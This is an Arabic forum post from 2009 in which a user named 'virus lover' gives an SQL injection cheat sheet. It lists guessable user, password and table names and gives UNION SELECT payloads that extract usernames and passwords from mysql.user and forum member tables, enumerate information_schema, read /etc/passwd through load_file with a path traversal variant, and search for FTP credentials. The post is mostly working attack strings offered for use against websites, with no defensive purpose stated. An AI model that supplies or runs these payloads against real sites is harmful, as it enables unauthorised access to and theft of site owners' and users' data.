الموضوع: اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن
عرض مشاركة واحدة
قديم 02-03-2009, 12:24 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
عاشق الفيروسات
 
الصورة الرمزية عاشق الفيروسات
 

 
 
إحصائية العضو





عاشق الفيروسات غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
عاشق الفيروسات is on a distinguished road
. اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن


اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن

اقتباس:
user & users & username & admin & adminlogim & login & member & membername

user_name

الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن

اقتباس:
password & pass & passwd & pwd
اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس

اقتباس:
user
users
mysql.user
mysql.db
mysql.dbh
smf_members
ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن

الان مثلا اسم القاعده في الموقع هذي ( mysql.user ) لو نبغي نستخرج يوزر الموقع بيكون الاستغلال بهذا الشكل

اقتباس:
union+select+1,2,user,4,5+from+mysql.user
ونفس الاستغلال السابق لليوزر لو نبغي نستخرج باسورد اليوزر اللي خرج لنا بيكون الاستغلال بهذا الشكل

اقتباس:
union+select+1,2,password,4,5+from+mysql.user
مثال اخر على الكلمات السابقه للتوضيع

اقتباس:
union+select+1,2,membername,4,5+from+smf_members
لاستخراج الجداول في قواعد البيانات وقت الحقن

اقتباس:
union+select+1,2,table_name,4,5+from+information_s chema.tables
لاستخراج الاعمده في قواحد البيانات وقت الحقن

اقتباس:
union+select+1,2,column_name,4,5+from+information_ schema.columns
الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل

طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً

اقتباس:
union+select+1,2,username,4,5+from+users+where+use rid=1/*
الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه

اقتباس:
load_file("/هنا الاوامر")
مثال على هذا

اقتباس:
union+select+1,load_file("/"),3,4+from+mysql.user
وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر

اقتباس:
union+select+1,load_file("/etc/passwd"),3,4+from+mysql.user
او نجرب هذا نفس الامر بس نتراجع للخلف

اقتباس:
union+select+1,load_file("/../../etc/passwd"),3,4+from+mysql.user
الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن

هذا الامر خاص بالبحث في الجداول

اقتباس:
union+select+1,2,table_name,4,5+from+information_s chema.tables+where+table_name+like+'%25ftp%25'/*

هذا الامر خاص بالبحث في الاعمده

اقتباس:
union+select+1,2,column_name,4,5+from+information_ schema.columns+where+column_name+like+'%25ftp%25'/*
FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ

اقتباس:
'%25ftp%25' <<< في هذا الامر
تقدر تكتب اللي تبيه كتخمين منك انت مثلا ftp تستطيع ان تخمن اللي تبيه مثلا بدال كامة

اقتباس:
'%25user%25' & '%25logim%25'
يعني حاول تخمن اكبر عدد من الكلمات المحتمله وحط في بالك ان كل سيرفر يختلف عن الثاني

ممكن في سيرفر تطلع معاك بيانات كثيره وسيرفر غيره مايطلع معاك شي عادي

تحياتي عاشق الفيروسات



hslhx hgd,.vhj hglpjlgi td r,hu] hgfdhkhj ,rj hgprk

التوقيع


:::::: ارفع راسك انت عراقي::::::

كل عراقي دمه للأبد راقي

أني عراقي ومن اصل راقي::: جذاب يلي يكول الغربة

تراد:::هننياله للي يشم تراب بغداد::::
http://www9.0zz0.com/2008/08/24/11/889849729.jpg
احلى مقولة عندي واعترف بها

ليس العيب أن تكون لا تعرف , إنما العيب أن تدعي بأنك تعرف
تستطيع أن تفعل أي شيء تضع كل تفكيرك فيه

بيل كيتس
تحياتي عاشق الفيروسات

 

   

رد مع اقتباس